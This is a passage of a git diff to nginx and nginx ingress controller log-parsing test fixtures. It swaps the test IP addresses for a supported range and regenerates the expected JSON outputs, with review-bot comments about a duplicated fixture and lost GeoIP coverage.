@@ -168,12 +174,12 @@ "related": { "ip": [ "127.0.0.1", - "1.2.3.4" + "67.43.156.15" ] }, "destination": { "port": 80, - "ip": "1.2.3.4" + "ip": "67.43.156.15" }, "http": { "response": { @@ -188,8 +194,8 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-06-09T13:15:11.704805400Z", - "original": "1.2.3.4:80 127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] \"\" 400 0 \"-\" \"-\"\nexample.com:80 unix: - - [26/Feb/2019:15:39:42 +0100] \"hello\" 400 173 \"-\" \"-\"", + "ingested": "2021-12-09T13:41:43.172732700Z", + "original": "67.43.156.15:80 127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] \"\" 400 0 \"-\" \"-\"\nexample.com:80 unix: - - [26/Feb/2019:15:39:42 +0100] \"hello\" 400 173 \"-\" \"-\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -213,7 +219,7 @@ } }, "destination": { - "ip": "1.2.3.4" + "ip": "67.43.156.15" }, "source": { "address": "localhost" @@ -232,7 +238,7 @@ "_tmp": {}, "related": { "ip": [ - "1.2.3.4" + "67.43.156.15" ] }, "http": { @@ -248,8 +254,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.704809900Z", - "original": "1.2.3.4 localhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"\nexample.com localhost, localhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", + "ingested": "2021-12-09T13:41:43.172738700Z", + "original": "67.43.156.15 localhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"\nexample.com localhost, localhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ 
diff --git a/packages/nginx/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json b/packages/nginx/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json index b6d06fe524e..76feff53fe3 100644 --- a/packages/nginx/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json +++ b/packages/nginx/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json @@ -20,7 +20,7 @@ "level": "error" }, "event": { - "ingested": "2021-06-09T13:15:11.834545200Z", + "ingested": "2021-12-09T13:41:43.902411600Z", "original": "2016/10/25 14:49:34 [error] 54053#0: *1 open() \"/usr/local/Cellar/nginx/1.10.2_1/html/favicon.ico\" failed (2: No such file or directory), client: 127.0.0.1, server: localhost, request: \"GET /favicon.ico HTTP/1.1\", host: \"localhost:8080\", referrer: \"http://localhost:8080/\"", "category": [ "web" @@ -56,7 +56,7 @@ "level": "error" }, "event": { - "ingested": "2021-06-09T13:15:11.834566800Z", + "ingested": "2021-12-09T13:41:43.902415500Z", "original": "2016/10/25 14:50:44 [error] 54053#0: *3 open() \"/usr/local/Cellar/nginx/1.10.2_1/html/adsasd\" failed (2: No such file or directory), client: 127.0.0.1, server: localhost, request: \"GET /adsasd HTTP/1.1\", host: \"localhost:8080\"", "category": [ "web" 
@@ -92,7 +92,7 @@ "level": "error" }, "event": { - "ingested": "2021-06-09T13:15:11.834572200Z", + "ingested": "2021-12-09T13:41:43.902420Z", "original": "2019/10/30 23:26:34 [error] 205860#205860: *180289 FastCGI sent in stderr: \"PHP message: PHP Warning: Declaration of FEE_Field_Terms::wrap($content, $taxonomy, $before, $sep, $after) should be compatible with FEE_Field_Post::wrap($content, $post_id = 0) in /var/www/xxx/web/wp-content/plugins/front-end-editor/php/fields/post.php on line 0\nPHP message: PHP Warning: Declaration of FEE_Field_Tags::wrap($content, $before, $sep, $after) should be compatible with FEE_Field_Terms::wrap($content, $taxonomy, $before, $sep, $after) in /var/www/xxx/web/wp-content/plugins/front-end-editor/php/fields/post.php on line 0\nPHP message: PHP Warning: Declaration of FEE_Field_Category::wrap($content, $sep, $parents) should be compatible with FEE_Field_Terms::wrap($content, $taxonomy, $before, $sep, $after) in /var/www/xxx/web/wp-content/plugins/front-end-editor/php/fields/post.php on line 0", "category": [ "web" @@ -128,7 +128,7 @@ "level": "error" }, "event": { - "ingested": "2021-06-09T13:15:11.834576500Z", + "ingested": "2021-12-09T13:41:43.902426Z", "original": "2019/11/05 14:50:44 [error] 54053#0: *3 open() \"/usr/local/Cellar/nginx/1.10.2_1/html/adsasd\" failed (2: No such file or directory), client: 127.0.0.1, server: localhost, request: \"GET /pysio HTTP/1.1\", host: \"localhost:8080\"", "category": [ "web" diff --git a/packages/nginx/manifest.yml b/packages/nginx/manifest.yml index 1982ac0ce65..f40978a8339 100644 --- a/packages/nginx/manifest.yml +++ b/packages/nginx/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: nginx title: Nginx -version: 1.2.1 +version: 1.2.2 license: basic description: Collect logs and metrics from Nginx HTTP servers with Elastic Agent. type: integration 
diff --git a/packages/nginx_ingress_controller/_dev/deploy/docker/ingress.log b/packages/nginx_ingress_controller/_dev/deploy/docker/ingress.log
index 5e6c5370233..0406e65af30 100644
--- a/packages/nginx_ingress_controller/_dev/deploy/docker/ingress.log
+++ b/packages/nginx_ingress_controller/_dev/deploy/docker/ingress.log
@@ -13,10 +13,10 @@ 192.168.64.1 - - [07/Feb/2020:11:56:36 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "http://hello-world.info/products/42" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 325 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 2593a1126588922449c183c8d9ddbbeb 192.168.64.1 - - [07/Feb/2020:11:56:54 +0000] "GET /products/42 HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 369 0.002 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 0f76ea730f282d5759018eb756b23b14 192.168.64.1 - - [07/Feb/2020:11:56:54 +0000] "GET / HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 358 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 21efd18e3a7952fc78c0f2dcc1f05e69 -77.179.66.156 - - [07/Feb/2020:11:56:54 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "http://hello-world.info/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 314 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 e096809c2cb46f004c3b538b23916e5b -77.179.66.156 - - [07/Feb/2020:11:56:56 +0000] "GET /v2 HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 360 0.002 [default-web2-8080] [] 172.17.0.6:8080 61 0.002 200 0a2a92d080e664dd4e95c85d097c9d3d -77.179.66.156 - - [07/Feb/2020:11:56:56 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "http://hello-world.info/v2" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 316 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 4c024ebfc20acfb2d59e542e3ed60789 -77.179.66.156 - - [07/Feb/2020:12:00:28 +0000] "GET /products/42?address=delhi+technological+university 
HTTP/1.1" 200 59 "-" "python-requests/2.22.0" 197 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 9a7babf34ca4ee59d90ac48d452a9214 -77.179.66.156 - - [07/Feb/2020:12:02:38 +0000] "GET /v2 HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 343 0.000 [default-web2-8080] [] 172.17.0.6:8080 61 0.001 200 ba91c30454893c121879396b0a78be79 -77.179.66.156 - - [07/Feb/2020:12:02:38 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 262 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 98c81aa2d50c67f6fb1fa16d5ce62f8f -77.179.66.156 - - [07/Feb/2020:12:02:42 +0000] "GET /v2/some HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 348 0.001 [default-web2-8080] [] 172.17.0.6:8080 61 0.000 200 835136ae24486dbb4156dcbe21f5d402 +67.43.156.13 - - [07/Feb/2020:11:56:54 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "http://hello-world.info/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 314 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 e096809c2cb46f004c3b538b23916e5b +67.43.156.13 - - [07/Feb/2020:11:56:56 +0000] "GET /v2 HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 360 0.002 [default-web2-8080] [] 172.17.0.6:8080 61 0.002 200 0a2a92d080e664dd4e95c85d097c9d3d +67.43.156.13 - - [07/Feb/2020:11:56:56 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "http://hello-world.info/v2" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 316 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 4c024ebfc20acfb2d59e542e3ed60789 +67.43.156.13 - - [07/Feb/2020:12:00:28 +0000] "GET /products/42?address=delhi+technological+university HTTP/1.1" 200 59 "-" 
"python-requests/2.22.0" 197 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 9a7babf34ca4ee59d90ac48d452a9214 +67.43.156.13 - - [07/Feb/2020:12:02:38 +0000] "GET /v2 HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 343 0.000 [default-web2-8080] [] 172.17.0.6:8080 61 0.001 200 ba91c30454893c121879396b0a78be79 +67.43.156.13 - - [07/Feb/2020:12:02:38 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 262 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 98c81aa2d50c67f6fb1fa16d5ce62f8f +67.43.156.13 - - [07/Feb/2020:12:02:42 +0000] "GET /v2/some HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 348 0.001 [default-web2-8080] [] 172.17.0.6:8080 61 0.000 200 835136ae24486dbb4156dcbe21f5d402 diff --git a/packages/nginx_ingress_controller/changelog.yml b/packages/nginx_ingress_controller/changelog.yml index de5b987106e..a84f3d42a83 100644 --- a/packages/nginx_ingress_controller/changelog.yml +++ b/packages/nginx_ingress_controller/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.2.0" changes: - description: Release nginx_ingress_controller package for v8.0.0 diff --git a/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log b/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log index 5e6c5370233..0406e65af30 100644 --- a/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log +++ b/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log 
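Review bot: This deploy-time log is a byte-for-byte duplicate of `data_stream/access/_dev/test/pipeline/test-ingest-raw.log` — both file headers carry the same blob ids `5e6c5370233..0406e65af30` before and after the change — so the same seven-line address edit had to be made twice by hand, and nothing stops the two copies drifting on the next such change. Since a comment line inside this file would itself be fed to the pipeline as a log line, I would have the docker deploy step copy the pipeline fixture, or at least name the pairing in the package README so the next editor knows to update both. Note also that this copy feeds the system test: if the stack's GeoIP test database does not resolve 67.43.156.13 (the regenerated pipeline expectation for these same lines later in this change carries no `source.geo`/`source.as`), the documents indexed by the system test will likewise go unenriched, which is worth confirming before merging.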
@@ -13,10 +13,10 @@ 192.168.64.1 - - [07/Feb/2020:11:56:36 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "http://hello-world.info/products/42" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 325 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 2593a1126588922449c183c8d9ddbbeb 192.168.64.1 - - [07/Feb/2020:11:56:54 +0000] "GET /products/42 HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 369 0.002 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 0f76ea730f282d5759018eb756b23b14 192.168.64.1 - - [07/Feb/2020:11:56:54 +0000] "GET / HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 358 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 21efd18e3a7952fc78c0f2dcc1f05e69 -77.179.66.156 - - [07/Feb/2020:11:56:54 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "http://hello-world.info/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 314 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 e096809c2cb46f004c3b538b23916e5b -77.179.66.156 - - [07/Feb/2020:11:56:56 +0000] "GET /v2 HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 360 0.002 [default-web2-8080] [] 172.17.0.6:8080 61 0.002 200 0a2a92d080e664dd4e95c85d097c9d3d -77.179.66.156 - - [07/Feb/2020:11:56:56 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "http://hello-world.info/v2" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 316 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 4c024ebfc20acfb2d59e542e3ed60789 -77.179.66.156 - - [07/Feb/2020:12:00:28 +0000] "GET /products/42?address=delhi+technological+university 
HTTP/1.1" 200 59 "-" "python-requests/2.22.0" 197 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 9a7babf34ca4ee59d90ac48d452a9214 -77.179.66.156 - - [07/Feb/2020:12:02:38 +0000] "GET /v2 HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 343 0.000 [default-web2-8080] [] 172.17.0.6:8080 61 0.001 200 ba91c30454893c121879396b0a78be79 -77.179.66.156 - - [07/Feb/2020:12:02:38 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 262 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 98c81aa2d50c67f6fb1fa16d5ce62f8f -77.179.66.156 - - [07/Feb/2020:12:02:42 +0000] "GET /v2/some HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 348 0.001 [default-web2-8080] [] 172.17.0.6:8080 61 0.000 200 835136ae24486dbb4156dcbe21f5d402 +67.43.156.13 - - [07/Feb/2020:11:56:54 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "http://hello-world.info/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 314 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 e096809c2cb46f004c3b538b23916e5b +67.43.156.13 - - [07/Feb/2020:11:56:56 +0000] "GET /v2 HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 360 0.002 [default-web2-8080] [] 172.17.0.6:8080 61 0.002 200 0a2a92d080e664dd4e95c85d097c9d3d +67.43.156.13 - - [07/Feb/2020:11:56:56 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "http://hello-world.info/v2" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 316 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 4c024ebfc20acfb2d59e542e3ed60789 +67.43.156.13 - - [07/Feb/2020:12:00:28 +0000] "GET /products/42?address=delhi+technological+university HTTP/1.1" 200 59 "-" 
"python-requests/2.22.0" 197 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 9a7babf34ca4ee59d90ac48d452a9214 +67.43.156.13 - - [07/Feb/2020:12:02:38 +0000] "GET /v2 HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 343 0.000 [default-web2-8080] [] 172.17.0.6:8080 61 0.001 200 ba91c30454893c121879396b0a78be79 +67.43.156.13 - - [07/Feb/2020:12:02:38 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 262 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 98c81aa2d50c67f6fb1fa16d5ce62f8f +67.43.156.13 - - [07/Feb/2020:12:02:42 +0000] "GET /v2/some HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 348 0.001 [default-web2-8080] [] 172.17.0.6:8080 61 0.000 200 835136ae24486dbb4156dcbe21f5d402 diff --git a/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log-expected.json b/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log-expected.json index 15c25d567d0..70287af6ce0 100644 --- a/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log-expected.json +++ b/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log-expected.json @@ -58,7 +58,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394839900Z", + "ingested": "2021-12-09T13:41:46.109908100Z", "original": "192.168.64.1 - - [07/Feb/2020:11:48:51 +0000] \"POST /products HTTP/1.1\" 200 59 \"-\" \"curl/7.54.0\" 89 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 529a007902362a5f51385a5fa7049884", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
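Review bot: Replacing 77.179.66.156 with 67.43.156.13 silently drops the GeoIP coverage this fixture used to give: the regenerated `test-ingest-raw.log-expected.json` later in this change (the `@@ -1225,26 +1225,8 @@` hunk and its six siblings) removes `source.geo` and `source.as` outright, where the old address produced country, region, city, location and AS fields. Presumably the test GeoIP database in the stack that regenerated the expectation has no City or ASN entry for 67.43.156.0/24 — I cannot tell from here — but the visible effect is that the access pipeline's geoip and ASN processors are no longer asserted by this test. Use an address from the supported subset that the test database does resolve — the nginx access expectation in this same change shows `2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6` yielding Denmark and AS 62121 — for at least one of the seven lines and regenerate, so the expected file asserts enrichment again; if no IPv4 in the subset resolves, record that in the changelog entry rather than leaving a silent coverage drop.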
@@ -137,7 +137,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394863300Z", + "ingested": "2021-12-09T13:41:46.109949200Z", "original": "192.168.64.1 - - [07/Feb/2020:11:49:15 +0000] \"GET /products/42 HTTP/1.1\" 200 59 \"-\" \"curl/7.54.0\" 91 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 68fa971ce4dfce685fdc01c877bfa645", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -216,7 +216,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394870700Z", + "ingested": "2021-12-09T13:41:46.109962300Z", "original": "192.168.64.1 - - [07/Feb/2020:11:49:30 +0000] \"DELETE /products/42 HTTP/1.1\" 200 59 \"-\" \"curl/7.54.0\" 94 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 0be411044cb1cb67580e115413b2da60", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -295,7 +295,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394897200Z", + "ingested": "2021-12-09T13:41:46.109967300Z", "original": "192.168.64.1 - - [07/Feb/2020:11:49:43 +0000] \"PATCH /products/42 HTTP/1.1\" 200 59 \"-\" \"curl/7.54.0\" 93 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 f479ab1d9cc8afcbac9e9f958ff8babc", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -361,7 +361,7 @@ "ip": "192.168.64.1" }, "event": { - "ingested": "2021-06-09T12:42:48.394903800Z", + "ingested": "2021-12-09T13:41:46.109978Z", "original": "192.168.64.1 - - [07/Feb/2020:11:49:50 +0000] \"PATCHp /products/42 HTTP/1.1\" 400 163 \"-\" \"-\" 0 0.000 [] [] - - - - 4c7d2079340e68353c7d0dfff00b904b", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -425,7 +425,7 @@ "ip": "192.168.64.1" }, "event": { - "ingested": "2021-06-09T12:42:48.394909100Z", + "ingested": "2021-12-09T13:41:46.109988500Z", "original": "192.168.64.1 - - [07/Feb/2020:11:50:09 +0000] \"geti /products/42 HTTP/1.1\" 400 163 \"-\" \"-\" 0 0.000 [] [] - - - - efb0c5aa8be6cdeb4a7e7bd090e3d893", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -502,7 +502,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394915Z", + "ingested": "2021-12-09T13:41:46.109993100Z", "original": "192.168.64.1 - - [07/Feb/2020:11:55:05 +0000] \"GET /products/42 HTTP/1.1\" 200 59 \"-\" \"Wget/1.20.3 (darwin18.6.0)\" 157 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 457b71c3e1ee1887bb809effd301a0ec", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -581,7 +581,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394920100Z", + "ingested": "2021-12-09T13:41:46.109998300Z", "original": "192.168.64.1 - - [07/Feb/2020:11:55:57 +0000] \"GET /products/42 HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\" 450 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 da29abf31e4d6324cebe5e7bca370709", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -666,7 +666,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394924900Z", + "ingested": "2021-12-09T13:41:46.110002800Z", "original": "192.168.64.1 - - [07/Feb/2020:11:55:57 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/products/42\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\" 381 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 e983c8cf3d713548baa50c9e2fffeb34", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -750,7 +750,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394929900Z", + "ingested": "2021-12-09T13:41:46.110008100Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:24 +0000] \"GET /v2 HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\" 441 0.002 [default-web2-8080] [] 172.17.0.6:8080 61 0.001 200 3d7ff18ff4181a7db5013a76f975d900", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -835,7 +835,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394935800Z", + "ingested": "2021-12-09T13:41:46.110020100Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:24 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/v2\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\" 372 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 d131fe4bcd359cf947f75efca4bfa553", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -919,7 +919,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394940500Z", + "ingested": "2021-12-09T13:41:46.110201Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:36 +0000] \"GET /products/42 HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 369 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 ef6629fcaaa1ea0d1a843cf2bf40571d", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1004,7 +1004,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394945100Z", + "ingested": "2021-12-09T13:41:46.110205500Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:36 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/products/42\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 325 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 2593a1126588922449c183c8d9ddbbeb", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -1088,7 +1088,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394949600Z", + "ingested": "2021-12-09T13:41:46.110210700Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:54 +0000] \"GET /products/42 HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 369 0.002 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 0f76ea730f282d5759018eb756b23b14", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1172,7 +1172,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394954100Z", + "ingested": "2021-12-09T13:41:46.110215800Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:54 +0000] \"GET / HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 358 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 21efd18e3a7952fc78c0f2dcc1f05e69", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1209,7 +1209,7 @@ } }, "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ], "upstream": { "name": "default-web-8080", @@ -1225,26 +1225,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "original": "/favicon.ico" @@ -1258,7 